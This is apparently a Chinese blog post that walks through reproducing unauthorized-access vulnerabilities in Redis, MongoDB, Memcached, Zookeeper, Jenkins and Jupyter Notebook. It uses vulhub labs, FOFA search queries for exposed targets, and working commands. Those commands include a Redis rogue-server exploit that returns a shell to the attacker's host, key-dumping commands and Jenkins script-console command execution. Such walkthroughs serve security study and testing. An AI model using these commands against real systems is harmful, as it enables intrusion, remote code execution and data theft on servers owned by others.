首页 > 其他分享 >未授权访问漏洞(漏洞复现合集)

未授权访问漏洞(漏洞复现合集)

时间:2024-08-04 23:24:56浏览次数:8  
标签:... 命令 漏洞 步骤 访问 复现 授权 合集

目录

一:Redis未授权访问漏洞 *

步骤一:进入vulhub目录使用以下命令启动靶机...

步骤二:在Kali上安装redis程序进行服务的链接

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞...下载以下攻击项目...

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

二:MongoDB未授权访问漏洞

步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境..

步骤二:使用Nmap的插件脚本进行扫描..发现存在未授权访问漏洞...

步骤三:即存在未授权访问漏洞使用Navicat进行连接...

三:Memcached未授权访问漏洞

步骤一:下载Memcached程序并执行以下命令.启动Memcached漏洞环境

步骤二:使用Telnet程序探测目标的11211端口..

步骤三:使用Nmap程序的脚本进行漏洞扫描...

四:Zookeeper未授权访问漏洞

步骤一:使用以下Fofa语法搜索资产信息...

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试.

步骤三:可使用Zookeeper可视化管理工具进行连接...

五:Jenkins未授权访问漏洞 *

步骤一:使用以下fofa语法进行产品搜索...

步骤二:在打开的URL中..点击 Manage Jenkins--> Scritp Console 在执行以下命令...

六:Jupyter NoteBook未授权访问漏洞*

步骤一:通过以下fofa语法进行产品搜索.或使用vulhub启动靶场...

步骤二:如果存在未授权访问漏洞则直接访问http://IP:8888会直接跳到web管理界面,不需要输入密码。

步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令


一:Redis未授权访问漏洞 *

  Redis 默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。

步骤一:进入vulhub目录使用以下命令启动靶机...

进入目录:

cd vulhub/redis/4-unacc

启动:

docker-compose up-d

检查:

docker-compose ps

步骤二:在Kali上安装redis程序进行服务的链接

#安装redis

apt-get install redis

#redis链接

redis-cli -h 目标IP -p 6379

#redis常见命令

1.查看信息:info

(2)删除所有数据库内容:flushall

(3)刷新数据库:flushdb

(4)看所有键:KEYS *,使用select num可以查看键值数据

(5)设置变量:set test "whoami"

(6)config set dir dirpath 设置路径等配置

(7)config get dir/dbfilename 获取路径及数据配置信息

(8)save保存

(9)get 变量,查看变量名称

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞...下载以下攻击项目...

https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 目标IP --lhost 自己IP
docker pull mongo

二:MongoDB未授权访问漏洞

  开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。

漏洞复现

步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境..

拉取镜像:

docker pull mongo

启动容器:

dockerrun-d -p 27017:27017 mongodb mongo

查看容器:

docker ps -a

步骤二:使用Nmap的插件脚本进行扫描..发现存在未授权访问漏洞...

#扫描命令

nmap-p 27017--script mongodb-info 目标IP

步骤三:即存在未授权访问漏洞使用Navicat进行连接...

三:Memcached未授权访问漏洞

  Memcached 是一套常用的 key-value 分布式高速缓存系统,由于 Memcached 的安全设计缺陷没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者无需认证通过命令交互可直接读取 Memcached中的敏感信息

漏洞复现

#Memcached程序下载

https://www.runoob.com/memcached/window-install-memcached.html

步骤一:下载Memcached程序并执行以下命令.启动Memcached漏洞环境

#执行命令

memcached.exe -d install

memcached.exe -d start

步骤二:使用Telnet程序探测目标的11211端口..

#Telnet探测

telnet 目标IP 11211

#操作命令

stats //查看memcache服务状态

stats items //查看所有items

stats cachedump 39 0 //获得缓存key

get:state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容造成敏感信息泄露

步骤三:使用Nmap程序的脚本进行漏洞扫描...

nmap -p 11211--script memcached-info 目标IP

四:Zookeeper未授权访问漏洞

  Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务Zookeeper的默认开放端口是 2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:ki命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

步骤一:使用以下Fofa语法搜索资产信息...

port=”2181”

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试.

echo envinc | nc ip 2181

步骤三:可使用Zookeeper可视化管理工具进行连接...

#工具下载

https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

 

五:Jenkins未授权访问漏洞 *

  默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索...

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中..点击 Manage Jenkins--> Scritp Console 在执行以下命令...

 

步骤三:#执行命令

println "whoami" .execute().text

六:Jupyter NoteBook未授权访问漏洞*

  Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888。

漏洞复现

步骤一:通过以下fofa语法进行产品搜索.或使用vulhub启动靶场...

#fofa语法

"Jupyter Notebook" && port="8888" && "terminals"

#vulhub靶

cd /vulhub/jupyter/notebook-rce
docker-compose up -d

步骤二:如果存在未授权访问漏洞则直接访问http://IP:8888会直接跳到web管理界面,不需要输入密码。

步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令

标签:...,命令,漏洞,步骤,访问,复现,授权,合集
From: https://blog.csdn.net/2301_76631050/article/details/140913853

相关文章

  • 常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
    目录一:WordPress步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】--》404.php步骤三:访问以下连接即可获取WebShel...姿势二:上传主......
  • ThinkAdmin_v6两个简单漏洞(文件读取+信息泄露)
    侵权声明本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[[email protected]]。我们将在确......
  • Jupyter NoteBook未授权访问漏洞
    JupyterNoteBook未授权访问漏洞JupyterNotebook(此前被称为IPythonnotebook)是一个交互式笔记本,支持运行40多种编程语言。如果管理员未为JupyterNotebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888。漏洞......
  • Jenkins未授权访问漏洞
    Jenkins未授权访问漏洞默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。漏洞复现步骤一:使用以下fofa语法进行产品搜索port="8080"&&......
  • Zookeeper未授权访问漏洞
    Zookeeper未授权访问漏洞Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进......
  • CVE-2023-26469 复现
    题目描述:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。这是一个csrf的洞,找了一下,......
  • Nexpose v6.6.263 for Linux & Windows - 漏洞扫描
    Nexposev6.6.263forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,releaseJul31,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随时了解您的风险。......
  • CVE-2022-4230 复现
    题目描述:WPStatisticsWordPress插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行SQL注入攻击。默认情况下,具有管理选项功能(admin+)的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。根据描述,我们直接去查看wp-admin路......
  • 退役CTF选手想拿xcpc牌子的第一天--AcWing基础语法课第一章代码复现
    文章目录变量、输入输出、表达式与顺序语句AcWing1AcWing604AcWing605AcWing606AcWing607AcWing608AcWing609AcWing610AcWing611AcWing612AcWing613AcWing614AcWing615AcWing616AcWing617AcWing618AcWing653AcWing654AcWing655AcWing656变量、输......
  • 机械电气领域会议合集 | 2024年下半年稳定检索EI国际学术会议推荐
    【JPCS出版|连续3届稳定EI检】第四届机电一体化技术与航空航天工程国际学术会议(ICMTAE2024)20244th InternationalConferenceon MechatronicsTechnologyandAerospaceEngineering*JPCS出版,南昌理工学院主办,检索历史良好大会官网:www.icmtae.org时间:2024年11月8-1......